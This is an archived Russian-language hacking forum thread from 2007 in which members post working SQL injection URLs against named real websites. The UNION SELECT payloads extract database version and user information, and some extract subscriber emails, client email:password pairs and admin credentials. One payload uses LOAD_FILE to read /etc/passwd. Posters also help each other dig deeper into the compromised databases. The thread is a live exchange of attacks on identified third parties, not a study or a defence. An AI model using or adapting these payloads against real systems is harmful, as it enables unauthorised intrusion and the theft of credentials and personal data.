HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.04.2007, 17:56
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://bila.com.ua/price_view.php?price_id=-1+union+select+1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version()),9,10,11,12,13,14/*
 
Ответить с цитированием

  #2  
Старый 04.04.2007, 18:45
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Цитата:
Сообщение от Grey  
Код:
http://bila.com.ua/price_view.php?price_id=-1+union+select+1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version()),9,10,11,12,13,14/*
бгг =)

Код:
http://bila.com.ua/price_list.php?searchtype=33&searchsub=-1+union+select+1,2,version()/*

www.f1-world.ru

5 мускуль
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

Последний раз редактировалось Ksander; 04.04.2007 в 19:31..
 
Ответить с цитированием

  #3  
Старый 04.04.2007, 19:33
XenOtai
Познающий
Регистрация: 30.12.2006
Сообщений: 32
Провел на форуме:
383436

Репутация: 68
По умолчанию

Код:
http://www.fpp-iis.ru/iss.php?page=-1+union+select+1,2,3,4,5,6/*

Возможно ли что-нибудь дальше?
 
Ответить с цитированием

  #4  
Старый 04.04.2007, 19:49
LolFEm
Участник форума
Регистрация: 08.09.2006
Сообщений: 194
Провел на форуме:
1627025

Репутация: 163
По умолчанию

Цитата:
Сообщение от XenOtai  
Код:
http://www.fpp-iis.ru/iss.php?page=-1+union+select+1,2,3,4,5,6/*

Возможно ли что-нибудь дальше?
для mysql.user запрос не прокатил... может быть есть другая база данных...

SELECT command denied to user 'tib_ips'@'xxx.xxx.xxx.xxx' for table 'user'
 
Ответить с цитированием

  #5  
Старый 04.04.2007, 18:02
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Код:
http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(char(58),version(),user(),database()),16,17,18,19,20,21,22,23/*&mode=chrono&order=0
Вывод в тайтле( сам чуть не прозевал=\)
Код:
http://www.michaeljfox.org/news/article.php?id=-5+union+select+convert(concat_ws(char(58),version(),user(),database())+using+latin1)/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #6  
Старый 04.04.2007, 19:56
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


По умолчанию

Цитата:
http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+40,1/*
пока еду дальше

Цитата:
http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,column_name,3,4,5,6,7,8,9,10,11+f rom+information_schema.columns+where+table_name=ch ar(120,95,111,114,100,101,114,115)+limit+19,1/*
заипался

Последний раз редактировалось alextoun; 04.04.2007 в 20:59..
 
Ответить с цитированием

  #7  
Старый 04.04.2007, 20:53
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.interfax-religion.ru/?act=news&div=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11,12,13/*
http://www.interfax-religion.ru/?act=news&div=-1+union+select+concat(id,char(58),email),2,3,4,5,6,7,8,9,10,11,12,13+from+subscribe+limit+0,1/*
Код:
http://askbook.kiev.ua/books.php?book=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15/*
 
Ответить с цитированием

  #8  
Старый 04.04.2007, 21:27
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию

LOAD_FILE('etc/passwd') проходит, но выдает путой результат ^_____^
На загрузку файлов не проверял.
На ошибки внимания не обращаем, имена файлов берутся из базы, поэтому ругает за отсутсвие.

Цитата:
http://www.produktonline.ru/list.php?link=2166+union+select+1,2,3,4,version(), 6,7,8,9,10,11,12,13,14,15,16,17,18,LOAD_FILE(0x2f6 574632f706173737764),20,21,22,23,24,25,26,27
 
Ответить с цитированием

  #9  
Старый 04.04.2007, 21:47
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


По умолчанию

Код:
http://www.di-do.ru/index.php?all=1&c1=-1+union+select+1,concat(email,0x3a,pass),3,4+from+clients/*
 
Ответить с цитированием

  #10  
Старый 04.04.2007, 21:57
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

compoundsemi.com

Код:
http://compoundsemi.com/documents/view/generic.php?id=-6913/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(name,0x3a,password),18+from+admin+limit+2,1/*
C пасами жопа =\
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.